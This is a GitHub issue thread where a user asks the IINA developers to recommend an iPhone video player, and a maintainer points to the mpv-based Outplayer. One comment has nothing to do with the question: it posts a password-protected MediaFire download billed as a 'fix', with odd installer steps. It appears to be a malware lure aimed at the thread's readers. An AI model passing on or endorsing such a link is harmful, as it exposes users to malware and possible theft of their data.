### ISSUE TITLE
An iPhone application for playing videos recommended by the IINA development team, please?

### ISSUE THREAD

**Issue by tsaphnat** [iina/iina#5156]
Can anyone from the development team advise what application I should install on my iPhone to play videos.
I am looking for an application that fits the Apple ecosystem that is simple, elegant, and as powerful as iina.
- consumes little CPU,
- able to play the most commonly used video formats,
- allows the airdrop video files transfers.

VLC is perfect but it is a bit too resource intensive and a bit too heavy to use.

**Comment by low-batt** [comment]
As I don't play videos on my iPhone I can't recommend a player.

For audio/video support IINA uses a library from the [mpv project](https://github.com/mpv-player/mpv). The mpv project's wiki contains a list of [Applications using mpv](https://github.com/mpv-player/mpv/wiki/Applications-using-mpv#gui-frontends). That list contains [Outplayer](https://apps.apple.com/us/app/outplayer/id1449923287):
> A media player for iOS devices based on mpv.

I recall coming across a post by the Outplayer author who mentioned being inspired by IINA. Because Outplayer is based on mpv it should have no problems with commonly used video formats.

That is all I know about Outplayer. I have never tried the app.

**Comment by toufiksalhi** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by tsaphnat** [comment]
Thank you very much. Sorry for using the bug and enhancement tracking tool and disturbing a team member. I can close the case with peace of mind. Indeed, I won't get a better answer.
